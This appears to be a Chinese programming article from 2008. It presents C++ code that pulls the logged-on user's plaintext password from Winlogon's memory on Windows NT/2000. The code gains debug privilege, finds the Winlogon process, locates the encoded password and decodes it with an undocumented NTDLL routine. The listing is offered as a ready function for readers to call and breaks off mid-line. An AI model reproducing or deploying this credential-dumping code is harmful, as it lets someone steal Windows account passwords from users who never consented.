| 本月文章推荐 |
C++中获取WinNT/Win2k当前用户名和密码发表日期:2008-3-8
|
|
本文所用的代码原创作者已不知.是ccrun的一个朋友磨刀老头提供给的,在此对作者表示感谢.经ccrun(老妖)在Win2k下试验成功. // 获取WinNT/Win2k当前用户名和密码,调用以下函数即可: // bool GetPassWord(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) //--------------------------------------------------------------------------- typedef strUCt _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; }UNICODE_STRING, *PUNICODE_STRING; typedef struct _QUERY_SYSTEM_INFORMATION { DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; }QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER { DWORD Count; DWORD Unk04; DWORD Unk08; }PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO { DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name [0x108]; }PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO { DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; }ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); // Private Prototypes BOOL IsWinNT(void); BOOL IsWin2K(void); BOOL AddDebugPrivilege(void); DWORD FindWinLogon(void); BOOL LocatePasswordPageWinNT(DWORD, PDWORD); BOOL LocatePasswordPageWin2K(DWORD, PDWORD); void ReturnWinNTPwd(String &, String &, String &); void ReturnWin2kPwd(String &, String &, String &); bool GetPassword(String &, String &, String &); // Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD dwPwdLen = 0; PVOID pvRealPwd = NULL; PVOID pvPwd = NULL; DWORD dwHashByte = 0; wchar_t wszUserName[0x400]; wchar_t wszUserDomain[0x400]; //--------------------------------------------------------------------------- bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { if(!IsWinNT() && !IsWin2K()) { // 只适合于2000或者XP return false; } // Add debug privilege to PasswordReminder - // this is needed for the search for Winlogon. if(!AddDebugPrivilege()) { // 不能够添加debug特权 return false; } // debug特权已经成功加入到本程序 HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL"); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress(hNtDll,"NtQuerySystemInformation"); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer"); pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation"); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer"); pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString |
| 上一篇:C++中建立对象间消息连接的一种系统方法
人气:419 下一篇:C++中类的数据成员的安全隐患 人气:639 |
| 浏览全部C/C++的内容
Dreamweaver插件下载 网页广告代码 祝你圣诞节快乐 2009年新年快乐 |
